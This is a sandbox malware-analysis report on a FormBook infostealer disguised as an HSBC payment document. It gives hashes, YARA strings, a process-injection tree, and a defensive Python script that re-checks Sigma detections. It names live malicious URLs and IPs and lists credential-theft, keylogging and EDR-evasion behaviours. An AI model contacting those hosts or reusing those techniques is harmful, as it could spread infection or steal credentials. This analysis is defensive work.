Windows Analysis Report
HSBCscancopy-invoice778483-payment87476MT103.exe

Overview

General Information

Sample name: HSBCscancopy-invoice778483-payment87476MT103.exe
Analysis ID: 1466744
MD5: 15125bd7f04e0129ceebb7781f7051d2
SHA1: d06ac0fc49a473fafac1069ebe195edd6996cec1
SHA256: e5f5e88e8becfe092d10a927f72f580fd3a98612989a69a1f6df309f32b169f6
Tags: exe, HSBC

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Rundll32 Execution Without CommandLine Parameters
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • HSBCscancopy-invoice778483-payment87476MT103.exe (PID: 7456 cmdline: "C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe" MD5: 15125BD7F04E0129CEEBB7781F7051D2)
    • svchost.exe (PID: 7508 cmdline: "C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • UTbMqukHxZGmxEZNWddXnDURe.exe (PID: 832 cmdline: "C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • rundll32.exe (PID: 8140 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
          • UTbMqukHxZGmxEZNWddXnDURe.exe (PID: 1164 cmdline: "C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7272 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author
00000002.00000002.1521221555.0000000003B10000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000002.00000002.1521221555.0000000003B10000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  Strings:
  • 0x2ae70:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1443f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000E.00000002.3730033950.00000000059A0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000E.00000002.3730033950.00000000059A0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  Strings:
  • 0x82409:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x6b9d8:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000B.00000002.3713233444.00000000027B0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
(11 entries in total; only the first are reproduced here)

Source | Rule | Description | Author
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  Strings:
  • 0x2d5d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16ba2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  Strings:
  • 0x2e3d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x179a2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process started | Author: Florian Roth (Nextron Systems) | Data:
              Command: "C:\Windows\SysWOW64\rundll32.exe"
              CommandLine: "C:\Windows\SysWOW64\rundll32.exe"
              CommandLine|base64offset|contains:
              Image: C:\Windows\SysWOW64\rundll32.exe
              NewProcessName: C:\Windows\SysWOW64\rundll32.exe
              OriginalFileName: C:\Windows\SysWOW64\rundll32.exe
              ParentCommandLine: "C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe"
              ParentImage: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
              ParentProcessId: 832
              ParentProcessName: UTbMqukHxZGmxEZNWddXnDURe.exe
              ProcessCommandLine: "C:\Windows\SysWOW64\rundll32.exe"
              ProcessId: 8140
              ProcessName: rundll32.exe
            Source: Process started | Author: Florian Roth (Nextron Systems) | Data:
              Command: "C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe"
              CommandLine: "C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe"
              CommandLine|base64offset|contains:
              Image: C:\Windows\SysWOW64\svchost.exe
              NewProcessName: C:\Windows\SysWOW64\svchost.exe
              OriginalFileName: C:\Windows\SysWOW64\svchost.exe
              ParentCommandLine: "C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe"
              ParentImage: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe
              ParentProcessId: 7456
              ParentProcessName: HSBCscancopy-invoice778483-payment87476MT103.exe
              ProcessCommandLine: "C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe"
              ProcessId: 7508
              ProcessName: svchost.exe
            Source: Process started | Author: vburov | Data:
              Command: "C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe"
              CommandLine: "C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe"
              CommandLine|base64offset|contains:
              Image: C:\Windows\SysWOW64\svchost.exe
              NewProcessName: C:\Windows\SysWOW64\svchost.exe
              OriginalFileName: C:\Windows\SysWOW64\svchost.exe
              ParentCommandLine: "C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe"
              ParentImage: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe
              ParentProcessId: 7456
              ParentProcessName: HSBCscancopy-invoice778483-payment87476MT103.exe
              ProcessCommandLine: "C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe"
              ProcessId: 7508
              ProcessName: svchost.exe
            No Snort rule has matched
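The process tree above shows svchost.exe (PID 7508) started by the sample but carrying the sample's own command line, and rundll32.exe (PID 8140) started with no DLL or entry-point argument; the Sigma records in this section are the process-creation events those two processes produced. The script below is an added example, not part of the Joe Sandbox report: it reconstructs those events from the tree and runs three simplified checks over them (rundll32 without arguments, svchost with an unexpected parent, and an image path that disagrees with the program named on the command line). The event field names follow Sysmon/Sigma process_creation conventions, the svchost parent allowlist is an assumption rather than the published rule's exact filter, and the parent of the initial sample, which the report does not list, is left as None.

```python
"""Re-run the checks behind the report's Sigma hits over process-creation events
reconstructed from its process tree.  Added example: the events are constructed
from the page, and the rule logic is a simplified re-implementation of what the
rules look for, not the Sigma project's matcher."""
import ntpath

SAMPLE = r"C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe"
DROPPED = (r"C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP"
           r"\UTbMqukHxZGmxEZNWddXnDURe.exe")
SVCHOST = r"C:\Windows\SysWOW64\svchost.exe"
RUNDLL32 = r"C:\Windows\SysWOW64\rundll32.exe"
FIREFOX = r"C:\Program Files\Mozilla Firefox\Firefox.exe"


def event(pid, image, cmdline, ppid, parent_image):
    """One process_creation record, Sysmon/Sigma field names."""
    return {"ProcessId": pid, "Image": image, "CommandLine": cmdline,
            "ParentProcessId": ppid, "ParentImage": parent_image}


# Constructed from the report's process tree (PIDs, images and command lines as
# listed there).  The parent of the initial sample is not in the report: None.
EVENTS = [
    event(7456, SAMPLE, f'"{SAMPLE}"', None, None),
    event(7508, SVCHOST, f'"{SAMPLE}"', 7456, SAMPLE),      # image is svchost, command line is the sample
    event(832, DROPPED, f'"{DROPPED}"', 7508, SVCHOST),
    event(8140, RUNDLL32, f'"{RUNDLL32}"', 832, DROPPED),   # rundll32 with no DLL/entry-point argument
    event(1164, DROPPED, f'"{DROPPED}"', 8140, RUNDLL32),
    event(7272, FIREFOX, f'"{FIREFOX}"', 8140, RUNDLL32),
]


def basename(path):
    return ntpath.basename(path).lower()


def first_token(cmdline):
    """Split a Windows command line into (program, remaining arguments),
    honouring a double-quoted program path."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end], s[end + 1:].strip()
    head, _, rest = s.partition(" ")
    return head, rest.strip()


def rundll32_without_args(ev):
    """rundll32.exe launched with nothing after the program path: no DLL, no
    export.  Normal use names a DLL; code injected into rundll32 needs none."""
    _, rest = first_token(ev["CommandLine"])
    return basename(ev["Image"]) == "rundll32.exe" and rest == ""


# Parents from which svchost.exe is normally started.  Simplified assumption,
# not the exact filter list of the published rule.
EXPECTED_SVCHOST_PARENTS = {"services.exe", "msmpeng.exe", "mrt.exe", "rpcnet.exe", "svchost.exe"}


def svchost_uncommon_parent(ev):
    if basename(ev["Image"]) != "svchost.exe":
        return False
    parent = ev["ParentImage"]
    return parent is None or basename(parent) not in EXPECTED_SVCHOST_PARENTS


def image_cmdline_mismatch(ev):
    """The kernel-reported image differs from the program named on the command
    line, which is what the report's svchost.exe (PID 7508) record shows."""
    program, _ = first_token(ev["CommandLine"])
    return basename(program) != basename(ev["Image"])


RULES = {
    "rundll32_without_args": rundll32_without_args,
    "svchost_uncommon_parent": svchost_uncommon_parent,
    "image_cmdline_mismatch": image_cmdline_mismatch,
}


def evaluate(events):
    """Return (ProcessId, rule name) for every event/rule pair that matches."""
    return [(ev["ProcessId"], name) for ev in events for name, rule in RULES.items() if rule(ev)]


if __name__ == "__main__":
    for pid, name in evaluate(EVENTS):
        print(f"PID {pid}: {name}")
```

Run against the reconstructed tree, only PIDs 7508 and 8140 fire, which matches the report: the dropped UTbMqukHxZGmxEZNWddXnDURe.exe and firefox.exe children have a command line that agrees with their image and are not covered by either Sigma rule, so the process tree alone does not flag them.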


            AV Detection

            Source: http://www.778981.com/i74x/?ylT8el=rGww97JzOeWTLmyois9H82aBQ3facQDCwEviMnQ79nb2eFak94tqYxOEecYPqZ845ayBGu2PRCoY8TnogyJmQQHYtnGZFnvjZEpOTC2C7mypHaGwxY9ZF1g=&Qb94=7vWTifjxU | Avira URL Cloud: Label: malware
            Source: http://www.778981.com/i74x/ | Avira URL Cloud: Label: malware
            Source: HSBCscancopy-invoice778483-payment87476MT103.exe | ReversingLabs: Detection: 36%
            Source: HSBCscancopy-invoice778483-payment87476MT103.exe | Virustotal: Detection: 37%
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000002.00000002.1521221555.0000000003B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000E.00000002.3730033950.00000000059A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3713233444.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3725622704.0000000004660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3725563654.0000000004620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1520805638.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.3725564617.0000000003010000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1521716208.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
            Source: HSBCscancopy-invoice778483-payment87476MT103.exe | Joe Sandbox ML: detected
            Source: HSBCscancopy-invoice778483-payment87476MT103.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000A.00000002.3713104067.000000000051E000.00000002.00000001.01000000.00000005.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000000.1591634837.000000000051E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: HSBCscancopy-invoice778483-payment87476MT103.exe, 00000000.00000003.1262555347.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, HSBCscancopy-invoice778483-payment87476MT103.exe, 00000000.00000003.1261226236.0000000003840000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1521261547.0000000003E9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1521261547.0000000003D00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1430061242.0000000003B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1428153349.0000000003900000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3725946989.0000000004A2E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1521136098.0000000004526000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3725946989.0000000004890000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1523145097.00000000046DE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: HSBCscancopy-invoice778483-payment87476MT103.exe, 00000000.00000003.1262555347.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, HSBCscancopy-invoice778483-payment87476MT103.exe, 00000000.00000003.1261226236.0000000003840000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1521261547.0000000003E9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1521261547.0000000003D00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1430061242.0000000003B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1428153349.0000000003900000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000B.00000002.3725946989.0000000004A2E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1521136098.0000000004526000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3725946989.0000000004890000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1523145097.00000000046DE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rundll32.pdb source: svchost.exe, 00000002.00000003.1490000919.000000000363B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1489902771.000000000361A000.00000004.00000020.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000A.00000002.3723212263.0000000001488000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rundll32.pdbGCTL source: svchost.exe, 00000002.00000003.1490000919.000000000363B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1489902771.000000000361A000.00000004.00000020.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000A.00000002.3723212263.0000000001488000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: rundll32.exe, 0000000B.00000002.3728535943.0000000004EBC000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3713462234.0000000002A20000.00000004.00000020.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.000000000356C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1809205515.000000001E57C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: rundll32.exe, 0000000B.00000002.3728535943.0000000004EBC000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3713462234.0000000002A20000.00000004.00000020.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.000000000356C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1809205515.000000001E57C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00EE4696 GetFileAttributesW,FindFirstFileW,FindClose
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00EEC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00EEC93C FindFirstFileW,FindClose
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00EEF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00EEF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00EEF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00EE3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00EE3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00EEBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_027CC160 FindFirstFileW,FindNextFileW,FindClose
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4x nop then xor eax, eax | 11_2_027B96E0
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4x nop then mov ebx, 00000004h | 11_2_0474053E

            Networking

            Source: DNS query | www.hawalaz.xyz
            Source: Joe Sandbox View | IP Address: 162.0.213.72
            Source: Joe Sandbox View | IP Address: 217.116.0.191
            Source: Joe Sandbox View | ASN Name: ACPCA
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (19 identical entries)
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00EF25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: F-WEBDate: Wed, 03 Jul 2024 08:53:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 1127Connection: closeContent-Encoding: gzipFAI-W-FLOW: 1439477166Service-Lane: 3dfaa8cea5756c822fcb55c2bf34e96eFAI-W-AGENT_AID: 23934566Update-Time: 1718640911Src-Update: trueP3P: CP=CAO PSA OUROrigin-Agent-Cluster: ?0X-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenVary: Accept-EncodingSet-Cookie: _cliid=rI3wa6P8mig-JsqP; domain=www.yetung.com; path=/; expires=Thu, 03-Jul-2025 08:53:17 GMT; HttpOnlyData Raw: 1f 8b 08 00 00 00 00 00 00 00 cd 57 5b 6f dc 44 14 fe 2b 87 46 95 41 aa d7 7b c9 26 8d f7 22 35 97 15 91 8a e0 21 48 f0 54 cd da 63 ef 34 b6 c7 8c 67 d3 6c 57 91 a0 22 e2 01 89 52 01 aa 48 91 ca 03 0f 95 10 a9 04 12 20 da d0 1f 43 92 4d 9e f8 0b cc 8c ed dd 59 ef 26 55 a5 3c b0 96 bc eb f1 b9 7c df 77 ce 1c 7b 9b 6f ad bf bf b6 f5 f1 07 1b f0 ee d6 7b b7 db cd 1e 0f 03 71 c6 c8 6d 37 43 cc 11 38 3d c4 12 cc 5b 46 9f 7b e6 4d 23 5b ed 71 1e 9b f8 93 3e d9 69 19 1f 99 1f de 32 d7 68 18 23 4e ba 01 36 c0 a1 11 c7 91 70 d9 dc 68 61 d7 17 2b 56 e6 16 a1 10 b7 8c 6d 3c b8 47 99 9b 68 96 a6 31 6d e2 e2 c4 61 24 e6 84 46 45 2b 4e 78 80 db 66 d3 4a 7f 34 13 3e 08 30 f0 41 2c dc 38 de e5 96 93 88 c8 21 76 09 6a 19 22 0a c6 d1 8d 98 91 88 1b ed 2e 75 07 43 e8 22 67 db 67 b4 1f b9 f6 42 67 45 1e 8d 10 31 9f 44 36 94 e3 dd 86 27 b2 99 1e 0a 49 30 b0 8d 93 bf 0f cf 8e 9e 9f 3f d9 3f 7f f1 c8 b8 61 9c 1c 7e 79 7c f4 8d d1 00 65 94 90 fb d8 ae 54 85 cf 5e a9 4b 77 87 f7 88 cb 7b 36 54 ca e5 eb 93 88 80 fa 9c 36 7a 98 f8 3d 6e ab 0b 65 0c 25 05 7f 2d a5 06 43 d0 9d bb 42 1d cc cc 2e e5 9c 86 a6 43 03 ca 6c 58 c0 35 79 34 02 12 61 33 8b 57 97 80 35 42 63 db 4e a7 53 88 a2 64 b2 21 a1 01 71 0b b7 f2 d4 39 91 02 b6 f4 2a 63 57 2b cb 94 7a fa 94 a9 19 60 8f db 95 fa f5 46 8c 5c 97 44 be c9 69 6c 57 15 be 6c c5 96 4a 01 5c ac af 2e ab 
f2 cc d9 2c 56 97 96 ba d5 1c 5c d6 0e 19 a0 65 1d 90 d2 3a 93 3e 53 1e 32 ae 02 ce 58 1d cf f3 1a 73 44 f3 56 e4 d1 d0 1c e6 89 26 d7 35 c5 60 1a 15 94 30 63 94 6d 86 7e 86 af 5a d3 f0 55 d2 82 65 08 e5 1d 05 12 0a 65 b4 a1 cf 82 b7 af 59 d6 dd fb 25 0f 91 64 90 88 f0 a1 45 42 e4 63 4b c5 97 e7 3b 24 f4 ef 74 fd 52 1c f9 d7 de 81 88 9a 0c c7 18 71 19 0c 4c 95 75 6f 82 2a 4c fc 71 8f 2d 2d 6b 90 a0 32 5d a4 ca 05 2d 25 7a aa dc a9 77 36 20 d3 41 b1 Data Ascii: W[oD+FA{&"5!HTc4glW"RH CMY&U<|w{o{qm7C8=[F{M#[q>i2h#N6pha+Vm<Gh1ma$FE+NxfJ4>0A,8!vj".uC"ggBgE1D6'I0??a~y|eT^Kw{6T6z=ne%-CB.ClX5y4a3W5BcNSd!q9*cW+z`F\DilWlJ\.,V\e:>S2XsDV&5`0cm~ZUeeY%dEBcK;$t
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: F-WEBDate: Wed, 03 Jul 2024 08:53:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 1127Connection: closeContent-Encoding: gzipFAI-W-FLOW: 1439662166Service-Lane: 3dfaa8cea5756c822fcb55c2bf34e96eFAI-W-AGENT_AID: 23934566Update-Time: 1718640911Src-Update: trueP3P: CP=CAO PSA OUROrigin-Agent-Cluster: ?0X-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenVary: Accept-EncodingSet-Cookie: _cliid=2-p6tn4e7V9He5fR; domain=www.yetung.com; path=/; expires=Thu, 03-Jul-2025 08:53:20 GMT; HttpOnlyData Raw: 1f 8b 08 00 00 00 00 00 00 00 cd 57 5b 6f dc 44 14 fe 2b 87 46 95 41 aa d7 7b c9 26 8d f7 22 35 97 15 91 8a e0 21 48 f0 54 cd da 63 ef 34 b6 c7 8c 67 d3 6c 57 91 a0 22 e2 01 89 52 01 aa 48 91 ca 03 0f 95 10 a9 04 12 20 da d0 1f 43 92 4d 9e f8 0b cc 8c ed dd 59 ef 26 55 a5 3c b0 96 bc eb f1 b9 7c df 77 ce 1c 7b 9b 6f ad bf bf b6 f5 f1 07 1b f0 ee d6 7b b7 db cd 1e 0f 03 71 c6 c8 6d 37 43 cc 11 38 3d c4 12 cc 5b 46 9f 7b e6 4d 23 5b ed 71 1e 9b f8 93 3e d9 69 19 1f 99 1f de 32 d7 68 18 23 4e ba 01 36 c0 a1 11 c7 91 70 d9 dc 68 61 d7 17 2b 56 e6 16 a1 10 b7 8c 6d 3c b8 47 99 9b 68 96 a6 31 6d e2 e2 c4 61 24 e6 84 46 45 2b 4e 78 80 db 66 d3 4a 7f 34 13 3e 08 30 f0 41 2c dc 38 de e5 96 93 88 c8 21 76 09 6a 19 22 0a c6 d1 8d 98 91 88 1b ed 2e 75 07 43 e8 22 67 db 67 b4 1f b9 f6 42 67 45 1e 8d 10 31 9f 44 36 94 e3 dd 86 27 b2 99 1e 0a 49 30 b0 8d 93 bf 0f cf 8e 9e 9f 3f d9 3f 7f f1 c8 b8 61 9c 1c 7e 79 7c f4 8d d1 00 65 94 90 fb d8 ae 54 85 cf 5e a9 4b 77 87 f7 88 cb 7b 36 54 ca e5 eb 93 88 80 fa 9c 36 7a 98 f8 3d 6e ab 0b 65 0c 25 05 7f 2d a5 06 43 d0 9d bb 42 1d cc cc 2e e5 9c 86 a6 43 03 ca 6c 58 c0 35 79 34 02 12 61 33 8b 57 97 80 35 42 63 db 4e a7 53 88 a2 64 b2 21 a1 01 71 0b b7 f2 d4 39 91 02 b6 f4 2a 63 57 2b cb 94 7a fa 94 a9 19 60 8f db 95 fa f5 46 8c 5c 97 44 be c9 69 6c 57 15 be 6c c5 96 4a 01 5c ac af 2e ab 
